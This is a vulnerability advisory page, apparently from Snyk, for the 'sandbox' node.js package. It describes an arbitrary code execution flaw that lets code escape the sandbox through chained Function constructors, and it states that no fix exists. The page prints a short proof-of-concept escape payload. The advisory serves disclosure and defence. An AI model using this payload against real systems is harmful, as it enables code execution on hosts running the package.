Homepage

sandbox@2.0.0-alpha3 vulnerabilities

A nifty javascript sandbox for node.js

  • latest version

    0.8.6

  • first published

    13 years ago

  • latest version published

    10 years ago

  • licenses detected

    • ISC
      >=2.0.0-alpha2
  • View sandbox package health on Snyk Advisor  (opens in a new tab)
    • Go back to all versions of this package
    Report a new vulnerability Found a mistake?

    Direct Vulnerabilities

    Known vulnerabilities in the sandbox package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • C
    Arbitrary Code Execution

    sandbox is a nifty javascript sandbox for node.js.

    Affected versions of the package are vulnerable to Arbitrary Code Execution. It is possible to escape the sandbox by using a combination of functions and constructors, allowing an attacker access to a process with root permissions, and load modules of their choosing in order to execute malicious code.

    PoC by io Void:

    new Function("
  return (
    this.constructor.constructor('
      return (this.process.mainModule.constructor._load
     )'
    )())"
  )()
("util").inspect("hi")

    How to fix Arbitrary Code Execution?

    There is no fix version for sandbox.

    *
    Go back to all versions of this package